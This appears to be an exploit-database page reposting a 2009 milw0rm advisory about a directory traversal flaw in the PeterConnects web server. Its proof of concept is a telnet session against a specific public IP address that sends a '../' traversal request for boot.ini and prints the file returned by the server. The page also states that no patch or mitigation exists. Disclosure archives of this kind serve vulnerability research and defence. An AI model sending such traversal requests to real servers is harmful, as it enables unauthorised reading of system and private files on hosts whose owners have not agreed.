header-logo
Suggest Exploit
vendor:
Unknown Product
by:
milw0rm.com
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Unknown Product
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PeterConnects Web Server Traversal Arbitrary File Access

PeterConnects products use a web server that is vulnerable to classic directory traversal (hello 1987) that allows for arbitrary file access.

Mitigation:

None
Source

Exploit-DB raw data:

- PeterConnects Web Server Traversal Arbitrary File Access

- Description

PeterConnects products use a web server that is vulnerable to classic
directory traversal (hello 1987) that allows for arbitrary file
access.

- Product

PeterConnects, Unknown Product, Unknown Version

(blind external tests not so good for full disclosure)

http://www.peter-connects.com/

- PoC

$ telnet 205.206.231.15 80
Trying 205.206.231.15...
Connected to 205.206.231.15.
Escape character is '^]'.
GET /../../../../boot.ini HTTP/1.0

HTTP/1.0 200 OK
Content-Type: application/octet-stream
Content-Length: 303

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003,
Enterprise" /noexecute=optout /fastdetect
multi(0)disk(0)rdisk(0)partition(4)\WINDOWS="Microsoft Windows XP
Professional" /fastdetect
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
[truncated]

- Solution

None

# milw0rm.com [2009-04-08]